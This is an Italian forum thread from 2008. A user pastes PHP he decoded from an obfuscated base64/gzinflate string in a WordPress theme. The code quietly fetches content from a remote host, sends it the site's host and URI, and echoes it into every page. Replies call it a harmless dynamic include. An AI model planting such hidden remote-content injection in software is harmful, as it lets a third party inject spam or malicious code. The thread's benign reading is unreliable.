• User Attivo

    Comprendere un codice php estratto da una stringa base64_decode

    Ho estrapolato un codice php decodificando un testo in formato gzinflate base64_decode, questo codice viene utilizzato in un template wordpress che sto utilizzando con uno dei miei siti.

    Il codice e' questo:

    
    error_reporting(0);
    $CodeURL = "h t t p//[...]/content.php?id=1793&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);
    
    if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
        echo @file_get_contents($CodeURL);
    } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
        $content = @file($CodeURL);
        echo @join("", $content);
    } elseif (function_exists("curl_init")) {
        $ch = curl_init($CodeURL);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
    }
    
    ```e richiama qualche funzione in questa pagina: 
    [....]
    
    Avete idea di cosa puo' voler dire?

  • User Attivo

    Ciao paolo,
    curl è un insieme di funzioni per gestire da php sessioni internet come se avessi un browser, con tanto di coockie e user agent per esempio...

    Ad occhio quello che fa il frammento di script postato è aprire una pagina web e restituirla...

    :ciauz:


  • User Attivo

    ci ho pensato sopra e sono arrivato alla conclusione che e' un sistema dinamico per includere contenuti nel template quando venivano visualizzati

    grazie

    P.S.: "Ultima modifica di Samyorn : 05-11-08 20:35. Motivo: Curare maiuscole e punteggiatura. No Spam"

    qualcuno mi puo' spiegare questo motivo?


  • Consiglio Direttivo

    Ciao paolo 🙂

    Come puoi vedere ho editato il tuo post mettendo le maiuscole ad inizio paragrafo (quelle colorate così), in quanto, come previsto dal regolamento:

    3.1. I titoli ed i testi devono essere scritti in italiano corretto, sia grammaticamente che ortograficamente.Poi ho provveduto ad editare i riferimenti al sito:
    6.2. Salvo le Aree Annunci, NON è consentito inserire nei post rimandi a propri siti e pagine web o annunci vari, sia con link attivo o anche solo riportando l'url.Spero ti sia ora tutto più chiaro 😉

    Alla prossima :ciauz: